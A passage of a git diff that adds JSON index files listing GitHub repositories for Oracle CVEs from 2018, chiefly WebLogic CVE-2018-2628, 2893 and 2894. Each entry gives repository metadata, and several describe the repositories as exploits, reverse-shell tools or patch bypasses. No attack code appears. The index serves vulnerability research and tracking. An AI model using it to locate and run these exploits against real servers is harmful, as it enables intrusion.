"aedoo\/CVE-2018-2628-MultiThreading", + "owner": { + "login": "aedoo", + "id": 19517413, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19517413?v=4", + "html_url": "https:\/\/github.com\/aedoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aedoo\/CVE-2018-2628-MultiThreading", + "description": "WebLogic WLS核心组件反序列化漏洞多线程批量检测脚本 CVE-2018-2628-MultiThreading", + "fork": false, + "created_at": "2018-04-18T17:50:29Z", + "updated_at": "2024-08-12T19:37:51Z", + "pushed_at": "2018-04-19T06:56:29Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 130153239, + "name": "CVE-2018-2628", + "full_name": "victor0013\/CVE-2018-2628", + "owner": { + "login": "victor0013", + "id": 37926610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37926610?v=4", + "html_url": "https:\/\/github.com\/victor0013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/victor0013\/CVE-2018-2628", + "description": "CVE-2018-2628", + "fork": false, + "created_at": "2018-04-19T03:19:15Z", + "updated_at": "2024-08-12T19:37:52Z", + "pushed_at": "2018-04-18T18:28:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 130239892, + "name": "CVE-2018-2628", + "full_name": "9uest\/CVE-2018-2628", + "owner": { + "login": "9uest", + "id": 11766504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11766504?v=4", + "html_url": "https:\/\/github.com\/9uest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9uest\/CVE-2018-2628", + "description": null, + "fork": false, + "created_at": "2018-04-19T15:56:49Z", + "updated_at": "2018-06-22T05:38:30Z", + "pushed_at": "2018-04-19T16:05:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 130291417, + "name": "CVE-2018-2628all", + "full_name": "Shadowshusky\/CVE-2018-2628all", + "owner": { + "login": "Shadowshusky", + "id": 31649758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31649758?v=4", + "html_url": "https:\/\/github.com\/Shadowshusky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadowshusky\/CVE-2018-2628all", + "description": null, + "fork": false, + "created_at": "2018-04-20T01:24:17Z", + "updated_at": "2022-07-18T10:31:35Z", + "pushed_at": "2018-04-20T01:24:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 130296227, + "name": "CVE-2018-2628", + "full_name": "shaoshore\/CVE-2018-2628", + "owner": { + "login": "shaoshore", + "id": 36906351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36906351?v=4", + "html_url": "https:\/\/github.com\/shaoshore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaoshore\/CVE-2018-2628", + "description": null, + "fork": false, + "created_at": "2018-04-20T02:14:21Z", + "updated_at": "2018-04-20T02:14:21Z", + "pushed_at": "2018-04-20T02:14:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 131935440, + "name": "ysoserial-cve-2018-2628", + "full_name": "tdy218\/ysoserial-cve-2018-2628", + "owner": { + "login": "tdy218", + "id": 4214030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4214030?v=4", + "html_url": "https:\/\/github.com\/tdy218", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdy218\/ysoserial-cve-2018-2628", + "description": "Some codes for bypassing Oracle WebLogic CVE-2018-2628 patch", + "fork": false, + "created_at": "2018-05-03T03:13:05Z", + "updated_at": "2024-09-25T02:56:46Z", + "pushed_at": "2018-05-21T09:06:43Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-2628", + "weblogic", + "ysoserial" + ], + "visibility": "public", + "forks": 49, + "watchers": 114, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 136104138, + "name": "cve-2018-2628", + "full_name": "wrysunny\/cve-2018-2628", + "owner": { + "login": "wrysunny", + "id": 20748454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20748454?v=4", + "html_url": "https:\/\/github.com\/wrysunny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wrysunny\/cve-2018-2628", + "description": "cve-2018-2628 反弹shell", + "fork": false, + "created_at": "2018-06-05T01:47:02Z", + "updated_at": "2018-06-05T01:48:07Z", + "pushed_at": "2018-06-05T01:48:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 136164259, + "name": "CVE-2018-2628", + "full_name": "jas502n\/CVE-2018-2628", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-2628", + "description": "Weblogic 反序列化漏洞(CVE-2018-2628)", + "fork": false, + "created_at": "2018-06-05T11:00:40Z", + "updated_at": "2024-01-08T16:34:19Z", + "pushed_at": "2019-09-30T01:18:02Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 103, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 138707761, + "name": "CVE-2018-2628", + "full_name": "stevenlinfeng\/CVE-2018-2628", + "owner": { + "login": "stevenlinfeng", + "id": 29966693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29966693?v=4", + "html_url": "https:\/\/github.com\/stevenlinfeng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stevenlinfeng\/CVE-2018-2628", + "description": null, + "fork": false, + "created_at": "2018-06-26T08:25:57Z", + "updated_at": "2018-06-26T08:25:57Z", + "pushed_at": "2018-06-26T08:25:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 139417715, + "name": "CVE-2018-2628", + "full_name": "likekabin\/CVE-2018-2628", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2018-2628", + "description": null, + "fork": false, + "created_at": "2018-07-02T09:00:34Z", + "updated_at": "2019-05-26T06:58:12Z", + "pushed_at": "2018-07-02T09:00:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 147341225, + "name": "WebLogic-RCE-exploit", + "full_name": "Nervous\/WebLogic-RCE-exploit", + "owner": { + "login": "Nervous", + "id": 172442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172442?v=4", + "html_url": "https:\/\/github.com\/Nervous", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nervous\/WebLogic-RCE-exploit", + "description": "A remote code execution exploit for WebLogic based on CVE-2018-2628", + "fork": false, + "created_at": "2018-09-04T12:17:21Z", + "updated_at": "2023-01-10T03:19:34Z", + "pushed_at": "2018-09-04T12:21:21Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 155318699, + "name": "CVE-2018-2628", + "full_name": "Lighird\/CVE-2018-2628", + "owner": { + "login": "Lighird", + "id": 28284964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28284964?v=4", + "html_url": "https:\/\/github.com\/Lighird", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lighird\/CVE-2018-2628", + "description": "CVE-2018-2628漏洞工具包", + "fork": false, + "created_at": "2018-10-30T03:26:16Z", + "updated_at": "2024-09-25T02:41:07Z", + "pushed_at": "2018-10-30T03:35:42Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 164424976, + "name": "CVE-2018-2628", + "full_name": "0xMJ\/CVE-2018-2628", + "owner": { + "login": "0xMJ", + "id": 31585175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31585175?v=4", + "html_url": "https:\/\/github.com\/0xMJ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xMJ\/CVE-2018-2628", + "description": "漏洞利用工具", + "fork": false, + "created_at": "2019-01-07T11:47:59Z", + "updated_at": "2024-04-06T18:10:13Z", + "pushed_at": "2019-01-07T12:13:37Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 233997916, + "name": "weblogicScanner", + "full_name": "0xn0ne\/weblogicScanner", + "owner": { + "login": "0xn0ne", + "id": 16507416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16507416?v=4", + "html_url": "https:\/\/github.com\/0xn0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn0ne\/weblogicScanner", + "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", + "fork": false, + "created_at": "2020-01-15T04:26:29Z", + "updated_at": "2024-11-28T15:07:29Z", + "pushed_at": "2023-11-24T09:21:56Z", + "stargazers_count": 2014, + "watchers_count": 2014, + "has_discussions": true, + "forks_count": 339, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2016-0638", + "cve-2016-3510", + "cve-2017-10271", + "cve-2017-3248", + "cve-2018-2893", + "cve-2018-2894", + "cve-2018-3191", + "cve-2018-3245", + "cve-2018-3252", + "cve-2019-2618", + "cve-2019-2725", + "cve-2019-2729", + "cve-2019-2888", + "cve-2019-2890", + "cve-2020-14750", + "cve-2020-14882", + "cve-2020-14883", + "cve-2020-2551", + "cve-2020-2555", + "cve-2020-2883" + ], + "visibility": "public", + "forks": 339, + "watchers": 2014, + "score": 0, + "subscribers_count": 37 + }, + { + "id": 285784115, + "name": "cve-2018-2628", + "full_name": "seethen\/cve-2018-2628", + "owner": { + "login": "seethen", + "id": 24458163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24458163?v=4", + "html_url": "https:\/\/github.com\/seethen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seethen\/cve-2018-2628", + "description": "漏洞复现", + "fork": false, + "created_at": "2020-08-07T08:56:21Z", + "updated_at": "2020-08-07T08:56:25Z", + "pushed_at": "2020-08-07T08:56:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402992319, + "name": "cve-2018-2628", + "full_name": "BabyTeam1024\/cve-2018-2628", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/cve-2018-2628", + "description": null, + "fork": false, + "created_at": "2021-09-04T07:22:46Z", + "updated_at": "2024-08-12T20:16:09Z", + "pushed_at": "2021-09-04T07:42:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 518331461, + "name": "weblogic-cve-2018-2628", + "full_name": "cscadoge\/weblogic-cve-2018-2628", + "owner": { + "login": "cscadoge", + "id": 103396060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103396060?v=4", + "html_url": "https:\/\/github.com\/cscadoge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cscadoge\/weblogic-cve-2018-2628", + "description": "weblogic-cve-2018-2628-exp", + "fork": false, + "created_at": "2022-07-27T06:10:28Z", + "updated_at": "2022-07-27T06:11:37Z", + "pushed_at": "2022-07-27T06:26:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2636.json b/2018/CVE-2018-2636.json new file mode 100644 index 0000000000..2a09483467 --- /dev/null +++ b/2018/CVE-2018-2636.json @@ -0,0 +1,73 @@ +[ + { + "id": 119399468, + "name": "CVE-2018-2636", + "full_name": "erpscanteam\/CVE-2018-2636", + "owner": { + "login": "erpscanteam", + "id": 35491827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35491827?v=4", + "html_url": "https:\/\/github.com\/erpscanteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erpscanteam\/CVE-2018-2636", + "description": "ERPScan Public POC for CVE-2018-2636", + "fork": false, + "created_at": "2018-01-29T15:16:02Z", + "updated_at": "2024-08-12T19:35:52Z", + "pushed_at": "2018-02-01T15:36:19Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 22, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 120569870, + "name": "micros_honeypot", + "full_name": "Cymmetria\/micros_honeypot", + "owner": { + "login": "Cymmetria", + "id": 19413345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19413345?v=4", + "html_url": "https:\/\/github.com\/Cymmetria", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cymmetria\/micros_honeypot", + "description": "MICROS Honeypot is a low interaction honeypot to detect CVE-2018-2636 in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (MICROS). This is a directory traversal vulnerability.", + "fork": false, + "created_at": "2018-02-07T05:54:46Z", + "updated_at": "2024-09-21T11:33:42Z", + "pushed_at": "2018-09-25T22:00:12Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "deception", + "honeypot", + "micros", + "oracle", + "security", + "security-tools", + "security-vulnerability", + "vulnerability" + ], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2844.json b/2018/CVE-2018-2844.json new file mode 100644 index 0000000000..826d8851f2 --- /dev/null +++ b/2018/CVE-2018-2844.json @@ -0,0 +1,33 @@ +[ + { + "id": 146413224, + "name": "virtualbox-cve-2018-2844", + "full_name": "renorobert\/virtualbox-cve-2018-2844", + "owner": { + "login": "renorobert", + "id": 4233909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4233909?v=4", + "html_url": "https:\/\/github.com\/renorobert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renorobert\/virtualbox-cve-2018-2844", + "description": null, + "fork": false, + "created_at": "2018-08-28T08:04:19Z", + "updated_at": "2024-08-12T19:41:12Z", + "pushed_at": "2018-08-28T08:06:21Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 100, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2879.json b/2018/CVE-2018-2879.json new file mode 100644 index 0000000000..234821ab1c --- /dev/null +++ b/2018/CVE-2018-2879.json @@ -0,0 +1,95 @@ +[ + { + "id": 142485401, + "name": "Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit", + "full_name": "MostafaSoliman\/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit", + "owner": { + "login": "MostafaSoliman", + "id": 13528184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13528184?v=4", + "html_url": "https:\/\/github.com\/MostafaSoliman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MostafaSoliman\/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit", + "description": null, + "fork": false, + "created_at": "2018-07-26T19:31:45Z", + "updated_at": "2024-08-12T19:40:22Z", + "pushed_at": "2021-08-15T14:18:12Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 142787515, + "name": "oracle-oam-authentication-bypas-exploit", + "full_name": "AymanElSherif\/oracle-oam-authentication-bypas-exploit", + "owner": { + "login": "AymanElSherif", + "id": 41875662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41875662?v=4", + "html_url": "https:\/\/github.com\/AymanElSherif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AymanElSherif\/oracle-oam-authentication-bypas-exploit", + "description": "Exploit for Oracle Access Manager padding oracle vulnerability (CVE-2018-2879)", + "fork": false, + "created_at": "2018-07-29T18:56:25Z", + "updated_at": "2022-07-23T07:53:15Z", + "pushed_at": "2019-03-04T12:29:04Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 181337856, + "name": "OAMBuster", + "full_name": "redtimmy\/OAMBuster", + "owner": { + "login": "redtimmy", + "id": 40774163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40774163?v=4", + "html_url": "https:\/\/github.com\/redtimmy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redtimmy\/OAMBuster", + "description": "Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879)", + "fork": false, + "created_at": "2019-04-14T16:32:08Z", + "updated_at": "2024-03-21T02:42:46Z", + "pushed_at": "2019-08-06T12:42:05Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 24, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2893.json b/2018/CVE-2018-2893.json new file mode 100644 index 0000000000..6be456cb77 --- /dev/null +++ b/2018/CVE-2018-2893.json @@ -0,0 +1,219 @@ +[ + { + "id": 141531715, + "name": "CVE-2018-2893", + "full_name": "sry309\/CVE-2018-2893", + "owner": { + "login": "sry309", + "id": 15671013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15671013?v=4", + "html_url": "https:\/\/github.com\/sry309", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sry309\/CVE-2018-2893", + "description": "CVE-2018-2893", + "fork": false, + "created_at": "2018-07-19T06:06:10Z", + "updated_at": "2024-08-12T19:40:11Z", + "pushed_at": "2018-07-19T05:59:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 141552858, + "name": "CVE-2018-2893", + "full_name": "artofwar344\/CVE-2018-2893", + "owner": { + "login": "artofwar344", + "id": 26774168, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26774168?v=4", + "html_url": "https:\/\/github.com\/artofwar344", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artofwar344\/CVE-2018-2893", + "description": "CVE-2018-2893 PoC", + "fork": false, + "created_at": "2018-07-19T09:03:25Z", + "updated_at": "2018-07-19T09:03:27Z", + "pushed_at": "2018-07-19T06:12:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 141678694, + "name": "CVE-2018-2893", + "full_name": "bigsizeme\/CVE-2018-2893", + "owner": { + "login": "bigsizeme", + "id": 17845094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17845094?v=4", + "html_url": "https:\/\/github.com\/bigsizeme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigsizeme\/CVE-2018-2893", + "description": "反弹shell生成器", + "fork": false, + "created_at": "2018-07-20T07:26:43Z", + "updated_at": "2024-01-09T13:17:19Z", + "pushed_at": "2018-07-23T04:31:27Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 141856470, + "name": "CVE-2018-2893", + "full_name": "pyn3rd\/CVE-2018-2893", + "owner": { + "login": "pyn3rd", + "id": 41412951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41412951?v=4", + "html_url": "https:\/\/github.com\/pyn3rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyn3rd\/CVE-2018-2893", + "description": "CVE-2018-2893-PoC", + "fork": false, + "created_at": "2018-07-22T01:15:58Z", + "updated_at": "2024-10-25T07:43:36Z", + "pushed_at": "2018-10-27T01:42:20Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 103, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 142403659, + "name": "CVE-2018-2893", + "full_name": "qianl0ng\/CVE-2018-2893", + "owner": { + "login": "qianl0ng", + "id": 26949233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26949233?v=4", + "html_url": "https:\/\/github.com\/qianl0ng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qianl0ng\/CVE-2018-2893", + "description": "可以直接反弹shell", + "fork": false, + "created_at": "2018-07-26T07:16:38Z", + "updated_at": "2024-04-07T03:11:31Z", + "pushed_at": "2023-04-05T14:06:13Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 47, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 151921677, + "name": "CVE-2018-2893", + "full_name": "jas502n\/CVE-2018-2893", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-2893", + "description": "CVE-2018-2893", + "fork": false, + "created_at": "2018-10-07T08:41:14Z", + "updated_at": "2024-03-15T10:01:52Z", + "pushed_at": "2018-10-07T09:53:54Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 219763712, + "name": "CVE-2018-2893", + "full_name": "ianxtianxt\/CVE-2018-2893", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2018-2893", + "description": "CVE-2018-2893", + "fork": false, + "created_at": "2019-11-05T14:22:04Z", + "updated_at": "2024-08-12T19:54:34Z", + "pushed_at": "2019-11-05T14:22:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2894.json b/2018/CVE-2018-2894.json new file mode 100644 index 0000000000..a8b6d7438f --- /dev/null +++ b/2018/CVE-2018-2894.json @@ -0,0 +1,126 @@ +[ + { + "id": 141601079, + "name": "cve-2018-2894", + "full_name": "111ddea\/cve-2018-2894", + "owner": { + "login": "111ddea", + "id": 41444127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41444127?v=4", + "html_url": "https:\/\/github.com\/111ddea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/111ddea\/cve-2018-2894", + "description": "cve-2018-2894 不同别人的利用方法。", + "fork": false, + "created_at": "2018-07-19T15:50:35Z", + "updated_at": "2021-10-22T07:46:36Z", + "pushed_at": "2018-07-22T08:34:27Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 141661586, + "name": "CVE-2018-2894", + "full_name": "LandGrey\/CVE-2018-2894", + "owner": { + "login": "LandGrey", + "id": 16769779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16769779?v=4", + "html_url": "https:\/\/github.com\/LandGrey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LandGrey\/CVE-2018-2894", + "description": "CVE-2018-2894 WebLogic Unrestricted File Upload Lead To RCE Check Script", + "fork": false, + "created_at": "2018-07-20T03:59:18Z", + "updated_at": "2024-11-09T17:50:22Z", + "pushed_at": "2018-07-20T12:46:50Z", + "stargazers_count": 136, + "watchers_count": 136, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 49, + "watchers": 136, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 151928392, + "name": "CVE-2018-2894", + "full_name": "jas502n\/CVE-2018-2894", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-2894", + "description": "Weblogic,CVE-2018-2894", + "fork": false, + "created_at": "2018-10-07T10:07:41Z", + "updated_at": "2024-11-01T16:30:48Z", + "pushed_at": "2019-09-11T03:47:54Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + 